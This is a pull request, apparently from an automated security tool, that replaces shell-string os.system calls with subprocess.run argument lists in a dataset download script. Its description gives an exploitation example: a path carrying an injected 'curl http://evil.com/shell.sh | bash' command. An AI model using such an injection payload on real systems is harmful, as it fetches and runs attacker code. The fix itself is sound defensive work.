### PR TITLE
fix: use subprocess instead of os.system in dataset_download.py

### DIFF
--- a/research/delf/delf/python/datasets/sfm120k/dataset_download.py
+++ b/research/delf/delf/python/datasets/sfm120k/dataset_download.py
@@ -15,6 +15,7 @@
 """Structure-from-Motion dataset (Sfm120k) download function."""
 
 import os
+import subprocess
 
 import tensorflow as tf
 
@@ -49,18 +50,18 @@ def download_train(data_dir):
     print('>> Image directory does not exist. Creating: {}'.format(dst_dir))
     tf.io.gfile.makedirs(dst_dir)
     print('>> Downloading ims.tar.gz...')
-    os.system('wget {} -O {}'.format(src_file, dst_file))
+    subprocess.run(['wget', src_file, '-O', dst_file], check=True)
     print('>> Extracting {}...'.format(dst_file))
-    os.system('tar -zxf {} -C {}'.format(dst_file, dst_dir))
+    subprocess.run(['tar', '-zxf', dst_file, '-C', dst_dir], check=True)
     print('>> Extracted, deleting {}...'.format(dst_file))
-    os.system('rm {}'.format(dst_file))
+    subprocess.run(['rm', dst_file], check=True)
 
   # Create symlink for train/retrieval-SfM-30k/.
   dst_dir_old = os.path.join(datasets_dir, 'retrieval-SfM-120k', 'ims')
   dst_dir = os.path.join(datasets_dir, 'retrieval-SfM-30k', 'ims')
   if not (tf.io.gfile.exists(dst_dir) or os.path.islink(dst_dir)):
     tf.io.gfile.makedirs(os.path.join(datasets_dir, 'retrieval-SfM-30k'))
-    os.system('ln -s {} {}'.format(dst_dir_old, dst_dir))
+    subprocess.run(['ln', '-s', dst_dir_old, dst_dir], check=True)
     print(
             '>> Created symbolic link from retrieval-SfM-120k/ims to '
             'retrieval-SfM-30k/ims')
@@ -89,7 +90,7 @@ def download_train(data_dir):
       if not os.path.isfile(dst_file):
         print('>> DB file {} does not exist. Downloading...'.format(
                 download_files[i]))
-        os.system('wget {} -O {}'.format(src_file, dst_file))
+        subprocess.run(['wget', src_file, '-O', dst_file], check=True)
 
       if download_eccv2020:
         eccv2020_dst_file = os.path.join(dst_dir, download_eccv2020)
@@ -99,5 +100,5 @@ def download_train(data_dir):
           eccv2020_dst_file = os.path.join(dst_dir, download_eccv2020)
           eccv2020_src_file = os.path.join(eccv2020_src_dir,
                                            download_eccv2020)
-          os.system('wget {} -O {}'.format(eccv2020_src_file,
-                                           eccv2020_dst_file))
+          subprocess.run(['wget', eccv2020_src_file, '-O', eccv2020_dst_file],
+                         check=True)


### PR DESCRIPTION
## Summary
Fix high severity security issue in `research/delf/delf/python/datasets/sfm120k/dataset_download.py`.

## Vulnerability
| Field | Value |
|-------|-------|
| **ID** | V-001 |
| **Severity** | HIGH |
| **Scanner** | multi_agent_ai |
| **Rule** | `V-001` |
| **File** | `research/delf/delf/python/datasets/sfm120k/dataset_download.py:52` |
| **Assessment** | Likely exploitable |

**Description**: The dataset_download.py script uses os.system() with string formatting to construct shell commands for wget, tar, and rm operations. While URLs are hardcoded, the dst_dir and dst_file variables are derived from the user-supplied data_dir parameter. If an attacker controls the data_dir argument, they could inject shell metacharacters into the constructed commands.

## Evidence

**Exploitation scenario**: An attacker who controls the data_dir parameter (e.g., by calling download_train with a crafted path like '/tmp/test; curl http://evil.com/shell.sh | bash; #') could inject arbitrary shell commands.

**Scanner confirmation**: multi_agent_ai rule `V-001` flagged this pattern.

**Production code**: This file is in the production codebase, not test-only code.

## Changes
- `research/delf/delf/python/datasets/sfm120k/dataset_download.py`

## Verification
- [x] Build passes
- [x] Scanner re-scan confirms fix
- [x] LLM code review passed

---
*Automated security fix by [OrbisAI Security](https://orbisappsec.com)*
